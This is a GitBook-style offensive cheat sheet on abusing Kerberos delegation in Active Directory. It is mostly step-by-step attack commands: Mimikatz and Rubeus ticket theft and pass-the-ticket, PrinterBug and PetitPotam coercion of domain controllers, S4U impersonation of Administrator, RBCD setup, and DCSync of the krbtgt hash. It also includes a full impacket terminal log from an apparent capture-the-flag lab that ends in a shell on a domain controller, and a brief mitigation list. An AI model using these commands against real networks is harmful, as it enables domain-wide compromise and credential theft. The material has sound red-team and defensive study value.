Trustee and Resource Delegation

Exploiting Delegation

LogoThreats & Research Archives - F-Secure BlogF-Secure Blog
https://www.guidepointsecurity.com/blog/delegating-like-a-boss-abusing-kerberos-delegation-in-active-directory/www.guidepointsecurity.com

Delegations

LogoGitHub - TheManticoreProject/Delegations: A tool to work with all types of Kerberos delegations (unconstrained, constrained, and resource-based constrained delegations) in Active DirectoryGitHub

ADeleginator

LogoGitHub - techspence/ADeleginator: A companion tool that uses ADeleg to find insecure trustee and resource delegations in Active DirectoryGitHub

NXC

nxc ldap 192.168.56.11 -u eddard.stark -p FightP3aceAndHonor! --find-delegation

https://x.com/al3x_n3ff/status/1857153795949559875?t=3iN0A-aTMN58zD0O7rIIlA&s=03

SharpADWS

LogoGitHub - wh0amitz/SharpADWS: Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS).GitHub

Unconstrained Delegation

Unconstrained Delegation: allows the first hop server to request access to any service on any computer in the domain

Getting Domain Admin with Kerberos Unconstrained Delegation
Active Directory Security Risk #101: Kerberos Unconstrained Delegation (or How Compromise of a Single Server Can Compromise the Domain)Active Directory Security

Discovery

  • PowerView

Get-DomainComputer -UnConstrained

  • AD Module

Get-ADComputer -Filter {TrustedForDelegation -eq $True}
Get-ADUser -Filter {TrustedForDelegation -eq $True}

Compromise the server where unconstrained delegation is enabled

Wait for a DA to connect then

Invoke-Mimikatz -Command '"sekurlsa::tickets /export"'

Reuse DA token

Invoke-Mimikatz -Command '"kerberos::ptt C:\path\to\[****]-*****-Administrator@krbtgt-DOMAIN.LOCAL.kirbi"'

Trick a high user to connect to a machine with Unconstrained Delegation ? Printer Bug

MisconfigurationPrint Spooler
LogoMS-RPRN abuse (PrinterBug)The Hacker Recipes

Printerbug also works across a Two-way forest trust with TGT Delegation enabled - See Trusts

Capture the TGT of dc$ by using Rubeus on victim server

Rubeus.exe monitor /interval:5 /nowrap

Printerbug - Run MS-RPRN.exe

LogoGitHub - leechristensen/SpoolSample: PoC tool to coerce Windows hosts authenticate to other machines via the MS-RPRN RPC interface. This is possible via other protocols as well.GitHub
LogoPrecompiledBinaries/SpoolSample.exe at master ยท jtmpu/PrecompiledBinariesGitHub
MS-RPRN.exe \\dc.domain.local \\vicitm.domain.local

# Victim host
Rubeus.exe monitor /interval:5 /nowrap

Or with PetitPotam

LogoGitHub - topotam/PetitPotam: PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.GitHub
.\PetitPotam.exe victim-hostname

# Victim host
Rubeus.exe monitor /interval:5 /nowrap

On Linux, use Coercer

SMB (445, 139) / RPC

ShadowCoerce or DFSCoerce can also be used

LogoGitHub - ShutdownRepo/ShadowCoerce: MS-FSRVP coercion abuse PoCGitHub
LogoGitHub - Wh04m1001/DFSCoerceGitHub

Copy the base64 encoded TGT and remove extra spaces before use it

Rubeus.exe ptt /ticket:<Base64>

Or use Invoke-Mimikatz:

[IO.File]::WriteAllBytes("C:\AD\Tools\USDC.kirbi",
[Convert]::FromBase64String("ticket_from_Rubeus_monitor"))
Invoke-Mimikatz -Command '"kerberos::ptt C:\path\to\ticket.kirbi"'

Run DCSync

Invoke-Mimikatz -Command '"lsadump::dcsync /user:domain\krbtgt"'
DCSync

Mitigation

The following security controls should be implemented to mitigate unconstrained delegation:

  • Ensure computer objects are not configured for unconstrained delegation. If delegation is required for a computer object, use resource-based constrained delegation instead.

  • Ensure privileged user objects are configured as โ€˜sensitive and cannot be delegatedโ€™. This can be configured by using the โ€˜Account is sensitive and cannot be delegatedโ€™ option on the user object in Active Directory Users and Computers.

  • Ensure privileged user objects are members of the Protected Users security group. Members of this security group cannot be delegated.

  • Disable the Print Spooler service on Domain Controllers. This prevents the Print Spooler service from being used to coerce a Domain Controller into authenticating to another system.

https://www.cyber.gov.au/resources-business-and-government/maintaining-devices-and-systems/system-hardening-and-administration/system-hardening/detecting-and-mitigating-active-directory-compromises?s=03

Constrained Delegation - Protocol Transition

Constrained Delegation: allows the first hop server to request access only to specified computers

Service for User (S4U) used to impersonate a user

S4U2self: allows a forwardable TGS to itself on behalf of a user - TUSTED_TO_AUTHENTICATE_FOR_DELEGATION

S4U2proxy: allows a service to obtain a TGS to a second service on behalf of the user - msDS-AllowedToDelegateTo contains a list of SPN to which the token can be forwarded

Discovery

  • PowerView

Get-DomainUser -TrustedToAuth
Get-DomainComputer -TrustedToAuth

  • AD Module

Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo

Abusing with kekeo

password or NTLM/AES keys required

  1. Request a TGT

kekeo# tgt::ask /user:victim_user /domain:domain.local /rc4:<ntlm_hash>

  1. Request a TGS

kekeo# tgs::s4u /tgt:<tgt_from_step_1>.kirbi /user:Administrator@domain.local /service:cifs/mssql.domain.LOCAL
kekeo# tgs::s4u /tgt:<tgt_from_step_1>.kirbi /user:Administrator@domain.local /service:cifs/mssql.domain.LOCAL|HTTP/mssql.domain.LOCAL

  1. Inject the ticket

Invoke-Mimikatz -Command '"kerberos:ptt <tgs_from_step_2>.kirbi"'
ls \\mssql.domain.local\c$
Invoke-Command -ScriptBlock{whoami} -ComputerName mssql.domain.local

Abusing with Rubeus

Request TGT and TGS in a single command

Rubeus.exe s4u /user:victim_user /aes256:<aes_key> /impersonateuser:Administrator /msdsspn:CIFS/mssql.domain.LOCAL /ptt
ls \\mssql.domain.local\c$

The delegation occurs not only for the specified service but for any service running under the same account. No validation for the SPN specified

With rc4

Rubeus.exe s4u /user:appsvc /rc4:<ntlm_hash> /impersonateuser:administrator /msdsspn:CIFS/mssql.domain.local /altservice:HTTP /domain:domain.local /ptt

winrs -r:umssql-hostname cmd.exe

Abusing with kekeo

password or NTLM/AES keys required

  1. Request a TGT

kekeo# tgt::ask /user:victim_machine_account$ /domain:domain.local /rc4:<ntlm_hash>

  1. Request a TGS

kekeo# tgs::s4u /tgt:<tgt_from_step_1>.kirbi /user:Administrator@domain.local /service:time/dc.domain.LOCAL|ldap/dc.domain.LOCAL

  1. Inject the ticket

Invoke-Mimikatz -Command '"kerberos:ptt <tgs_from_step_2>.kirbi"'
Invoke-Mimikatz -Command '"lsadump::dcsync /user:domain\krbtgt"'

Abusing with Rubeus

Request TGT and TGS in a single command

Rubeus.exe s4u /user:victim_machine_account$ /aes256:<aes_key> /impersonateuser:Administrator /msdsspn:time/dc.domain.LOCAL /altservice:ldap /ptt
SafetyKatz.exe "lsadump::dcsync /user:domain\krbtgt" "exit"

Persistence - msDS-AllowedToDelegateTo

Persistence

Resource-based Constrained Delegation

Wagging the Dog: Abusing Resource-Based Constrained Delegation to Attack Active DirectoryShenanigans Labs
Logo(RBCD) Resource-based constrainedThe Hacker Recipes

Instead of SPNs on msDS-AllowedToDelegatTo on the front end service, access is control by a security descriptor of msDS-AllowedToActOnBehalfOfOtherIdentity (visible as PrincipalsAllowedToDelegateToAccount) on the resource/service

The service administrator can configure this delegation whereas for other type SeEnableDelagation privs required - by default only DA

Two privileges needed to abuse RBCD:

  1. Write permissions over the target service

  2. Control over an object which as SPN configured (like admin access do a domain joined machine or ability to join a machine to domain - ms-DS- MachineAccountQuota is 10 by default)

Write Permission

Find-InterestingDomainACL | ?{$_.identityreferencename -match 'username'}

Exploit

Configure RBCD

$comps = 'computer1$','computer2$'
Set-ADComputer -Identity victim -PrincipalsAllowedToDelegateToAccount $comps

Extract AES keys for computerx$

Invoke-Mimikatz -Command '"sekurlsa::ekeys"'

Use the AES key and access vicitm as ANY user we want

Rubeus.exe s4u /user:computer1$ /aes256:<aes_key> /msdsspn:http/victim /impersonateuser:administrator /ptt
winrs -r:victim cmd.exe

With Impacket

L.BIANCHI_ADM is a DA

โ”Œโ”€โ”€(kaliใ‰ฟkali)-[~/Desktop/bloodyAD]
โ””โ”€$ ./bloodyAD.py --host dc01.domain.htb --dc-ip 10.10.11.45 -d "DOMAIN.HTB" -u user -p 'password' -k add groupMember "DELEGATEDADMINS" "SVC_LDAP"
[+] SVC_LDAP added to DELEGATEDADMINS
                                                                                                                                                                          
โ”Œโ”€โ”€(kaliใ‰ฟkali)-[~/Desktop/bloodyAD]
โ””โ”€$ ./bloodyAD.py --host dc01.domain.htb -d "DOMAIN.HTB" --dc-ip 10.10.11.45 -k set object "SVC_LDAP" servicePrincipalName  -v "cifs/fake"
[+] SVC_LDAP's servicePrincipalName has been updated
                                                                                                                                                                          
โ”Œโ”€โ”€(kaliใ‰ฟkali)-[~/Desktop/bloodyAD]
โ””โ”€$ impacket-getTGT domain.htb/svc_ldap:password -dc-ip dc01.domain.htb
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in svc_ldap.ccache                                                                                                  
โ”Œโ”€โ”€(kaliใ‰ฟkali)-[~/Desktop/bloodyAD]
โ””โ”€$ export KRB5CCNAME=svc_ldap.ccache
                                                                                                                                                                          
โ”Œโ”€โ”€(kaliใ‰ฟkali)-[~/Desktop/bloodyAD]
โ””โ”€$ impacket-getST -spn 'cifs/dc01.domain.htb' -impersonate L.BIANCHI_ADM -dc-ip 10.10.11.45 -k 'domain.htb/svc_ldap:password'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Impersonating L.BIANCHI_ADM
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in L.BIANCHI_ADM@cifs_dc01.domain.htb@DOMAIN.HTB.ccache
                                                                                                                                                                          
โ”Œโ”€โ”€(kaliใ‰ฟkali)-[~/Desktop/bloodyAD]
โ””โ”€$ export KRB5CCNAME=L.BIANCHI_ADM@cifs_dc01.domain.htb@DOMAIN.HTB.ccache
                                                                                                                                                              
โ”Œโ”€โ”€(kaliใ‰ฟkali)-[~/Desktop/bloodyAD]
โ””โ”€$ impacket-wmiexec -k -no-pass DOMAIN.HTB/L.BIANCHI_ADM@dc01.domain.htb
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>type Users\Administrator\Desktop\root.txt

Constrained Delegation - Kerberos Only

Leverage RBCD to abuse Kerberos Only configuration

Enumeration

# AD Module
Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null"} -PropertiesmsDS-AllowedToDelegateTo

Create a new machine account

https://github.com/Kevin-Robertson/Powermad

Powermad.ps1 New-MachineAccount -MachineAccount studentcompX

Configure RBCD

# On victim host
Rubeus.exe asktgt /user:victim$ /aes256:<aes_key> /impersonateuser:administrator /domain:domain.local /ptt /nowrap

# With AD Module
Set-ADComputer -Identity victim$ -PrincipalsAllowedToDelegateToAccount studentcompX$ -Verbose

Get TGS

# Get hash
Rubeus.exe hash/password:P@ssword@123

Rubeus.exe s4u /impersonateuser:administrator /user:studentcompX$ /rc4:<rc4_hash> /msdsspn:cifs/victim.domain.local /nowrap

Request a new forwardable TGS

Rubeus.exe s4u /tgs:<base67_tgs_from_previous_step> /user:victim$ /aes256:<victim$_aes> /msdsspn:cifs/mssql.domain.local /altservice:http /nowrap /ptt

winrs -r:mssql.domain.local cmd.exe

Support this Gitbook

I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it.

PreviousAD FSNextLAPS

Last updated